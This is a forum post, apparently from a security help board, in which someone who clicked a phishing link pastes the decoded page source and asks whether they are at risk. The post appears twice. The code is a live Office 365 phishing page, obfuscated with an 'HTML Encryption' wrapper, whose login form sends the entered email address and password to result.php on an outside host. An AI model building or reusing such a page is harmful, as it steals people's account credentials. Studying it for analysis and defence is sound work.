R
Ran120112
Guest
Hi,
I had received an phishing email, and accidentally clicked it.
I had search the internet on how to decode it, and this is what shows, however I have no knowledge on what it mean, can anyone tell me am I'm in trouble since I clicked the link?
<script type="text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Sign in to Office 365</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<link href="http://thesimnews.com/box/owa/Untitled1.css" rel="stylesheet">
<link href="http://thesimnews.com/box/owa/nickeloffice.css" rel="stylesheet">
<script src="http://thesimnews.com/box/owa/jquery-1.11.1.min.js"></script>
<script src="http://thesimnews.com/box/owa/wwb10.min.js"></script>
<script>
$(document).ready(function()
{
LoadValue('Editbox1', 'local', 0);
LoadValue('Editbox2', 'local', 0);
LoadValue('Checkbox1', 'local', 1);
$("#Form1").submit(function(event)
{
StoreValue('Editbox1', 'local', 0);
StoreValue('Editbox2', 'local', 0);
StoreValue('Checkbox1', 'local', 1);
return true;
});
});
</script>
</head>
<body>
<div id="wb_Image1" style="position:absolute;left:0px;top:1px;width:1327px;height:666px;z-index:4;">
<img src="http://thesimnews.com/box/owa/images/Capture.PNG" id="Image1" alt=""></div>
<div id="wb_Text1" style="position:absolute;left:892px;top:160px;width:211px;height:16px;z-index:5;text-align:left;">
<span style="color:#DC143C;font-family:'Lucida Sans Unicode';font-size:13px;">Please login to continue upgrade</span></div>
<div id="wb_Form1" style="position:absolute;left:878px;top:174px;width:363px;height:174px;z-index:6;">
<form name="Form1" method="post" action="http://thesimnews.com/box/owa/result.php" enctype="multipart/form-data" accept-charset="UTF-8" target="_self" id="Form1">
<input type="hidden" name="formid" value="form1">
<input type="email" id="Editbox1" style="position:absolute;left:14px;top:11px;width:342px;height:24px;line-height:24px;z-index:0;" name="Email" value="" placeholder="*** Email address is removed for privacy ***">
<input type="password" id="Editbox2" style="position:absolute;left:14px;top:47px;width:342px;height:24px;line-height:24px;z-index:1;" name="Password" value="" placeholder=" Password">
<input type="checkbox" id="Checkbox1" name="" value="on" style="position:absolute;left:11px;top:85px;z-index:2;">
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:14px;top:136px;width:66px;height:31px;z-index:3;">
</form>
</div>
</body>
</html>'));
//-->
Continue reading...
I had received an phishing email, and accidentally clicked it.
I had search the internet on how to decode it, and this is what shows, however I have no knowledge on what it mean, can anyone tell me am I'm in trouble since I clicked the link?
<script type="text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Sign in to Office 365</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<link href="http://thesimnews.com/box/owa/Untitled1.css" rel="stylesheet">
<link href="http://thesimnews.com/box/owa/nickeloffice.css" rel="stylesheet">
<script src="http://thesimnews.com/box/owa/jquery-1.11.1.min.js"></script>
<script src="http://thesimnews.com/box/owa/wwb10.min.js"></script>
<script>
$(document).ready(function()
{
LoadValue('Editbox1', 'local', 0);
LoadValue('Editbox2', 'local', 0);
LoadValue('Checkbox1', 'local', 1);
$("#Form1").submit(function(event)
{
StoreValue('Editbox1', 'local', 0);
StoreValue('Editbox2', 'local', 0);
StoreValue('Checkbox1', 'local', 1);
return true;
});
});
</script>
</head>
<body>
<div id="wb_Image1" style="position:absolute;left:0px;top:1px;width:1327px;height:666px;z-index:4;">
<img src="http://thesimnews.com/box/owa/images/Capture.PNG" id="Image1" alt=""></div>
<div id="wb_Text1" style="position:absolute;left:892px;top:160px;width:211px;height:16px;z-index:5;text-align:left;">
<span style="color:#DC143C;font-family:'Lucida Sans Unicode';font-size:13px;">Please login to continue upgrade</span></div>
<div id="wb_Form1" style="position:absolute;left:878px;top:174px;width:363px;height:174px;z-index:6;">
<form name="Form1" method="post" action="http://thesimnews.com/box/owa/result.php" enctype="multipart/form-data" accept-charset="UTF-8" target="_self" id="Form1">
<input type="hidden" name="formid" value="form1">
<input type="email" id="Editbox1" style="position:absolute;left:14px;top:11px;width:342px;height:24px;line-height:24px;z-index:0;" name="Email" value="" placeholder="*** Email address is removed for privacy ***">
<input type="password" id="Editbox2" style="position:absolute;left:14px;top:47px;width:342px;height:24px;line-height:24px;z-index:1;" name="Password" value="" placeholder=" Password">
<input type="checkbox" id="Checkbox1" name="" value="on" style="position:absolute;left:11px;top:85px;z-index:2;">
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:14px;top:136px;width:66px;height:31px;z-index:3;">
</form>
</div>
</body>
</html>'));
//-->
Continue reading...